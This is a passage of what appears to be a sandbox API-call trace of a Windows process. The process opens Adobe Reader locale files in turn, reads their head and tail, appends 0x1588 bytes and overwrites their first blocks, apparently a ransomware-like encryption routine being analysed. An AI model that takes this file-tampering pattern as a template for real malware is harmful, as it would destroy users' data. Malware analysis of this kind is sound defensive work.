nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.002] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0077.003] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.003] CloseHandle (hObject=0x204) returned 1 [0077.003] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\reflow.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\reflow.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0077.004] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.004] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1000 [0077.004] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.004] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.004] ReleaseMutex (hMutex=0x168) returned 1 [0077.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.JPN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0077.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.JPN", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.JPN", lpUsedDefaultChar=0x0) returned 10 [0077.005] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f2bc*=0x1000, lpOverlapped=0x0) returned 1 [0077.007] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0077.007] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1588, lpOverlapped=0x0) returned 1 [0077.007] CloseHandle (hObject=0x204) returned 1 [0077.008] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Weblink.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\weblink.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0077.008] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.009] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5600 [0077.009] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.009] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.009] ReleaseMutex (hMutex=0x168) returned 1 [0077.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.JPN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.JPN", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.JPN", lpUsedDefaultChar=0x0) returned 11 [0077.009] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.012] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4600 [0077.012] ReadFile (in: hFile=0x204, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.013] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4600 [0077.013] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.013] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0077.013] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.014] CloseHandle (hObject=0x204) returned 1 [0077.014] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\DVA.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\dva.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0077.015] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.015] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3600 [0077.016] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.016] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.016] ReleaseMutex (hMutex=0x168) returned 1 [0077.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.KOR", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0077.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.KOR", cchWideChar=7, lpMultiByteStr=0x1f7abdc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.KOR", lpUsedDefaultChar=0x0) returned 7 [0077.016] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.018] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2600 [0077.019] ReadFile (in: hFile=0x204, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.019] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2600 [0077.020] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.020] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0077.020] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.020] CloseHandle (hObject=0x204) returned 1 [0077.021] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\RdLang32.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\rdlang32.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0077.023] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.023] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xf9c00 [0077.023] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.023] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.023] ReleaseMutex (hMutex=0x168) returned 1 [0077.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.KOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.KOR", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.KOR", lpUsedDefaultChar=0x0) returned 12 [0077.024] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0077.028] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.030] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf8c00 [0077.030] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.033] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf8c00 [0077.033] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.034] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0077.034] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0077.035] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.035] CloseHandle (hObject=0x204) returned 1 [0077.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Spelling.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\spelling.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0077.036] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.037] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2200 [0077.037] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0077.037] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.037] ReleaseMutex (hMutex=0x168) returned 1 [0077.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.KOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.KOR", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.KOR", lpUsedDefaultChar=0x0) returned 12 [0077.037] ReadFile (in: hFile=0x204, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.366] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1200 [0077.367] ReadFile (in: hFile=0x204, lpBuffer=0x2694c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2694c18*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.379] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1200 [0077.386] WriteFile (in: hFile=0x204, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.389] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0077.390] WriteFile (in: hFile=0x204, lpBuffer=0x2695c18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695c18*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.390] CloseHandle (hObject=0x204) returned 1 [0077.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Checkers.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\checkers.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0078.029] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0078.029] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1d800 [0078.029] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0078.029] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.030] ReleaseMutex (hMutex=0x168) returned 1 [0078.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.NOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.NOR", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.NOR", lpUsedDefaultChar=0x0) returned 12 [0078.030] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.050] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c800 [0078.050] ReadFile (in: hFile=0x1e4, lpBuffer=0x25ac0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac0a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.075] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c800 [0079.076] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.076] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0079.076] WriteFile (in: hFile=0x1e4, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.076] CloseHandle (hObject=0x1e4) returned 1 [0079.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\pddom.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\pddom.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0079.080] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.080] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2a00 [0079.080] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.080] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.080] ReleaseMutex (hMutex=0x168) returned 1 [0079.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.NOR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0079.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.NOR", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.NOR", lpUsedDefaultChar=0x0) returned 9 [0079.080] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.102] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0079.103] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.109] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0079.109] WriteFile (in: hFile=0x1e4, lpBuffer=0x2696c48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.109] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0079.109] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.109] CloseHandle (hObject=0x1e4) returned 1 [0079.110] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0079.154] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.155] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x8b6b [0079.155] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0079.155] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.155] ReleaseMutex (hMutex=0x168) returned 1 [0079.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0079.155] ReadFile (in: hFile=0x1dc, lpBuffer=0x25aa078, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25aa078*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.183] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, 